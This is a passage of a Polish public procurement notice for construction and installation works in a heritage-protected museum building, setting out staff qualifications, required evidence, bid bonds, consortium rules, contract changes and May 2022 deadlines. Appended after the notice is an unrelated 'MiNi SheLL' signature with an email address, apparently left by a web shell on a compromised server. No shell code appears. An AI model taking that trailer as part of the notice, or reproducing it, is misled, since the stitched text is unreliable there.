konstrukcyjnobudowlanej,<br/>bez ograniczeń, posiadającą co najmniej 5 letnie doświadczenie w pełnieniu<br/>funkcji kierownika robót po uzyskaniu w/w uprawnień, będącą członkiem właściwej izby<br/>samorządu zawodowego i posiadającą wymagane ubezpieczenie od odpowiedzialności<br/>cywilnej lub równoważne, uprawnioną do kierowania robotami budowlanymi w budynkach<br/>objętych ochroną konserwatorską, (zgodnie z art. 37 c ustawy dnia 23 lipca 2003 r. o<br/>ochronie zabytków i opiece nad zabytkami), lub przez co najmniej 18 miesięcy brała udział<br/>w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do<br/>rejestru lub inwentarza muzeum będącego instytucją kultury),<br/>b) 1 osobą przewidzianą do kierowania robotami instalacyjnymi wodno-kanalizacyjnymi,<br/>gazowymi i centralnego ogrzewania (kierownik robót), posiadającą uprawnienia do<br/>kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji<br/>i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, lub<br/>odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej<br/>obowiązujących przepisów oraz posiadającą co najmniej 5 letnie doświadczenie w<br/>pełnieniu funkcji kierownika robót sanitarnych po uzyskaniu w/w uprawnień; będącą<br/>członkiem właściwej izby samorządu zawodowego i posiadającą wymagane ubezpieczenie<br/>od odpowiedzialności cywilnej,<br/>c) 1 osobą przewidzianą do kierowania robotami instalacyjnymi elektrycznymi (kierownik<br/>robót), posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności<br/>instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,<br/>lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej<br/>obowiązujących przepisów oraz posiadającą co najmniej 5 letnie doświadczenie w<br/>pełnieniu funkcji kierownika robót elektrycznych po uzyskaniu w/w uprawnień; będącą<br/>członkiem właściwej izby samorządu zawodowego i posiadającą wymagane ubezpieczenie<br/>od odpowiedzialności cywilnej<br/>d) 6 pracownikami (w rozumieniu przepisów prawa pracy) do realizacji robót określonych w<br/>Rozdziale III § 6 ust. 5 pkt 1 Specyfikacji, <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający w postępowaniu nie wymaga złożenia podmiotowych środków dowodowych na potwierdzenie braku podstaw do wykluczenia o których mowa w art. 108 ust 1 ustawy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia okoliczności, o których mowa w art. 112 ust. 2 pkt 4 ustawy w zakresie<br/>zdolności technicznej lub zawodowej, określonych w Rozdziale V § 2 ust. 1, Wykonawca przedłoży:<br/>wykaz robót budowlanych, o których mowa w Rozdziale V § 2 ust. 1 pkt. 1 – sporządzony<br/>wg załącznika do Specyfikacji wraz z dowodami poświadczającymi ich należyte wykonanie.,<br/>b. dowody poświadczające, że roboty budowlane wskazane przez Wykonawcę w wykazie zostały<br/>wykonane należycie, w szczególności zawierające informację o tym, czy zostały wykonane<br/>zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. Zgodnie z postanowieniami<br/>§ 9 ust. 1 pkt 1 Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23.12.2020r. w<br/>sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich<br/>może żądać Zamawiający od Wykonawcy w postępowaniu o udzielenie zamówienia, dowodami<br/>tymi są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego<br/>roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym<br/>charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty.<br/>Wykonawca nie jest zobowiązany do przedłożenia dokumentów, które dotyczyłyby zamówień<br/>wykonanych na rzecz Zamawiającego,<br/>c. wykaz osób, w którym należy wskazać osoby, które będą uczestniczyć w wykonaniu zamówienia<br/>wraz z informacją na temat ich kwalifikacji zawodowych, uprawnień i doświadczenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami, na potwierdzenie<br/>spełnienia warunku udziału w postępowaniu, o którym mowa w Rozdziale V § 2 ust. 1 pkt 2<br/>SWZ - sporządzony wg wzoru stanowiącego załącznik do Specyfikacji,<br/>(zakres uprawnień budowlanych należy odczytywać zgodnie z treścią decyzji o ich nadaniu<br/>i w oparciu o przepisy będące podstawą ich nadania . W celu uniknięcia wątpliwości zaleca się<br/>podanie daty wydania uprawnień oraz dokładne cytowanie zakresu uprawnień z posiadanego<br/>zaświadczenia, a nie jedynie ich numer).<br/>3. Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, będzie zobowiązany przed<br/>podpisaniem umowy do dostarczenia Zamawiającemu wymaganych uprawnień dla osób,<br/>o których mowa w Rozdziale V § 2 ust. 1 pkt 2 Specyfikacji.<br/>4. W przypadku, kiedy Wykonawca, celem wykazania spełnienia warunków udziału w niniejszym<br/>postępowaniu, będzie polegał na zdolnościach innych podmiotów na zasadach określonych w art.<br/>118 ustawy, Wykonawca przedłoży wraz z ofertą dokumenty dotyczące podmiotu udostępniającego<br/>zasoby wskazane w ust. 2 stosownie do udostępnianych zasobów.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Wykonawca składa wraz z ofertą następujące przedmiotowe środki dowodowe w postaci wykazu<br/>innych, równoważnych rozwiązań, sporządzony wg wzoru stanowiącego załącznik do<br/>Specyfikacji oraz dowolne dokumenty wykazujące równoważność tych rozwiązań w stosunku do określonych w Opisie przedmiotu zamówienia lub Dokumentacji Techniczno-Projektowej<br/>potwierdzających, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania<br/>określone w opisie przedmiotu zamówienia – w przypadku zaoferowania w ofercie rozwiązań równoważnych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga, aby oferta była zabezpieczona wadium.<br/>2. Wysokość wadium wynosi:<br/>1) dla część 1 zamówienia – 38 000,00 zł (sł.: trzydzieści osiem tysięcy złotych <br/>2) dla części 2 zamówienia – 15 000,00 zł (sł.: piętnaście tysięcy złotych)<br/>Wadium może być wniesione w następujących formach:<br/>1) pieniądzu,<br/>2) poręczeniach bankowych lub poręczeniu spółdzielczej kasy oszczędnościowo-kredytowej, z tym<br/>że poręczenie kasy jest zawsze poręczeniem pieniężnym,<br/>3) gwarancjach bankowych,<br/>4) gwarancjach ubezpieczeniowych,<br/>5) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9<br/>listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3. Oferta Wykonawcy, który nie wniósł wymaganego wadium lub wadium wniesione zostało<br/>nieprawidłowo, zostanie odrzucona na podstawie art.223 ust. 1 pkt 14 ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku powinni<br/>spełniać warunki udziału w postępowaniu oraz złożyć dokumenty potwierdzające spełnienie tych<br/>warunków zgodnie z zapisami zawartymi w Rozdziale VI i VII Specyfikacji.<br/>2. Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo<br/>reprezentowania ich w postępowaniu i zawarcia umowy. Pełnomocnictwo winno być podpisane<br/>przez osobę/osoby uprawnioną (-e) do jego udzielenia tj. zgodnie z formą reprezentacji każdego<br/>z Wykonawców (podpisany kwalifikowanym podpisem elektronicznym). W przypadku<br/>wspólników spółki cywilnej dopuszczalne jest przedłożenie umowy spółki cywilnej, z której<br/>wynika zakres i sposób reprezentacji, a w przypadku konsorcjum przedłożenie umowy<br/>konsorcjum.<br/>3. Wykonawcy wspólnie ubiegający się o zamówienie, których oferta zostanie uznana za<br/>najkorzystniejszą, będą zobowiązani przedstawić Zamawiającemu przed zawarciem umowy<br/>stosowne porozumienie (umowę konsorcjum/spółki cywilnej) zawierające w swojej treści zapisy<br/>regulujące współpracę tych wykonawców,<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wskazują w formularzu oferty,<br/>które zakresy przedmiotu zamówienia wykonają poszczególni wykonawcy.<br/>Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa<br/>każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>6. Zamawiający określa szczególny, obiektywnie uzasadniony, sposób spełniania przez Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia warunków udziału w postępowaniu:<br/>1) warunek określony w § 2 ust. 1 pkt 1 niniejszego rozdziału będzie uznany za spełniony, jeżeli co<br/>najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia wykaże<br/>posiadanie łącznego doświadczenia określonego w tym warunku (tj. Zamawiający nie dopuszcza<br/>możliwości sumowania doświadczenia Wykonawców) i wykona roboty budowlane, do realizacji<br/>których te zdolności są wymagane;<br/>2) warunek określony w § 2 ust. 1 pkt 2 niniejszego rozdziału będzie uznany za spełniony, jeżeli<br/>jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia wykaże, że<br/>samodzielnie dysponuje wymaganym potencjałem osobowym, bądź wielu Wykonawców łącznie<br/>i wykonają usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> W oparciu o postanowienia art. 455ust. 1 pkt 1 ustawy Zamawiający przewiduje możliwość<br/>następujących zmian umowy bez konieczności przeprowadzenia nowego postępowania:<br/>1) zmiany wynagrodzenia w wyniku zmiany stawki podatku od towarów i usług VAT, w części<br/>obejmującej wynagrodzenie brutto za usługi niezbędne do wykonania przedmiotu umowy,<br/>wykonane od dnia obowiązywania nowej stawki podatku, bez zmiany wartości netto<br/>wynagrodzenia, z zastrzeżeniem postanowień przepisów wprowadzających nową stawkę podatku,<br/>2) zmiany ilościowego zakresu rzeczowego przedmiotu umowy w wyniku wystąpienia robót<br/>zaniechanych, dodatkowych, zamiennych i odmiennych, o których mowa w § 8 ust. 1,<br/>3) zmiany (wydłużenia) terminu wykonania przedmiotu umowy w wyniku wystąpienia robót<br/>dodatkowych, zamiennych lub odmiennych, o których mowa w § 8 ust. 1, o ile wpływają one na<br/>termin wykonania umowy,<br/>4) zmiany (wydłużenia) terminu wykonania przedmiotu umowy z przyczyn i na zasadach określonych<br/>w § 2 ust. 3,<br/>5) gdy zmiana jest korzystna dla Zamawiającego, w szczególności gdy obniży koszty wykonywania<br/>przedmiotu umowy albo skróci czas realizacji poszczególnych robót, jak i całości przedmiotu<br/>umowy,<br/>6) gdy zmiana spowodowana jest zmianą obowiązujących przepisów mających wpływ na<br/>wykonywanie przedmiotu umowy, w szczególności zmiany norm technicznych lub<br/>technologicznych, przepisów dotyczących ochrony środowiska, czy przepisów przeciwpożarowych,<br/>7) gdy zmiana jest spowodowana decyzjami właściwych organów administracji publicznej, w tym<br/>administracji zespolonej, w szczególności organów nadzoru budowlanego czy służby ochrony<br/>zabytków,<br/>8) zmiany osób wskazanych w § 4,<br/>9) rezygnacji z dotychczasowego podwykonawcy lub wskazania nowego podwykonawcy bądź<br/>zmiany wskazanych w § 10 podwykonawców lub zakresu robót wykonywanych przez aktualnych<br/>podwykonawców, z zastrzeżeniem, że jeżeli zmiana albo rezygnacja z podwykonawcy<br/>dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych<br/>w art. 118 ust. 1 ustawy, w celu wykazania spełniania warunków udziału w postępowaniu,<br/>wykonawca jest obowiązany wykazać zamawiającemu, że proponowany inny<br/>podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca, na którego zasoby wykonawca powoływał się w trakcie postępowania o<br/>udzielenie zamówienia.<br/>2. Postanowienia umowne zmienione z naruszeniem art. 454 i 455 podlegają unieważnieniu. Na miejsce<br/>unieważnionych postanowień umowy wchodzą postanowienia umowne w pierwotnym brzmieniu,<br/>zgodnie z postanowieniami art. 458 ustawy.<br/>3. Jeżeli Zamawiający zamierza zmienić warunki realizacji zamówienia, które wykraczają poza zmiany<br/>umowy dopuszczalne zgodnie z art. 454 i 455 ustawy, obowiązany jest przeprowadzić nowe<br/>postępowanie o udzielenie zamówienia, zgodnie z postanowieniami art. 454 ustawy<br/>4. W przypadku wystąpienia, opisanych w ust.1 przesłanek do zmiany terminu wykonania umowy strony<br/>dołożą wszelkich starań w celu ograniczenia do minimum opóźnienia w wykonaniu zobowiązań<br/>umownych,<br/>5. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić<br/>zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.<br/>6. Nie stanowi zmiany umowy:<br/>1) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana<br/>dokumentów potwierdzających wykonanie robót, zmiana nr rachunku bankowego),<br/>2) zmiany danych teleadresowych.<br/>7. Wszelkie zmiany i uzupełnienia treści niniejszej umowy wymagają formy pisemnej pod rygorem<br/>nieważności, z zastrzeżeniem postanowień ust. 6. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-25 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem ,, Formularza do złożenia zmiany, wycofania oferty lub wniosku dostępnego na ePUŁAP i udostępnionego również na miniPortalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla Wykonawców na miniPortalu, w szczegółach danego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-25 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Oferta Wykonawcy powinna składać się z następujących dokumentów:<br/>1) Oferty, złożonej pod rygorem nieważności w formie elektronicznej opatrzonej kwalifikowanym<br/>podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym, sporządzonej na formularzu stanowiącym załącznik do Specyfikacji,<br/>(w przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia - z wykorzystaniem dodatkowego formularza stanowiącego załącznik nr 1a do<br/>Specyfikacji)<br/>2) Ofertę oraz pozostałe oświadczenie i dokumenty, dla których Zamawiający określił w formie<br/>formularzy zamieszczonych w załącznikach do SWZ, powinny być sporządzone zgodnie z tymi<br/>wzorami, co do treści oraz opisu kolumn i treści.<br/>3) szczegółowego kosztorysu ofertowego, w formie elektronicznej opatrzonej kwalifikowanym<br/>podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym sporządzonego z uwzględnieniem postanowień Rozdziału VIII,<br/>4) oświadczenia potwierdzającego spełnianie warunków udziału w postępowaniu oraz brak podstaw<br/>do wykluczenia z postępowania, w oryginale w formie elektronicznej opatrzonej<br/>kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym sporządzonego na formularzu stanowiącym załącznik do<br/>Specyfikacji,<br/>5) oryginału lub notarialnie poświadczonej kopii pełnomocnictw osób podpisujących ofertę<br/>w imieniu Wykonawcy, o ile upoważnienie do reprezentowania Wykonawcy nie wynika z innych<br/>dokumentów załączonych przez Wykonawcę. Dokument pełnomocnictwa należy złożyć<br/>w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem<br/>zaufanym lub podpisem osobistym mocodawcy,<br/>6) dowodu wniesienia wadium - oryginalny dokument elektroniczny, opatrzony kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym gwaranta lub<br/>poręczyciela, potwierdzający wniesienie wadium w formie innej niż pieniądz, w przypadku gdy<br/>Wykonawca składa wadium w tej formie (poręczenie, gwarancja), sporządzony zgodnie z<br/>wymaganiami określonymi w Rozdziale IX SWZ. W przypadku wniesienia wadium w pieniądzu<br/>na rachunek bankowy Zamawiającego, Wykonawca dołącza do oferty potwierdzenie przelewu w<br/>postaci elektronicznej,<br/>7) przedmiotowe środki dowodowe, o których mowa w § 2 niniejszego rozdziału,

Creat By MiNi SheLL
Email: jattceo@gmail.com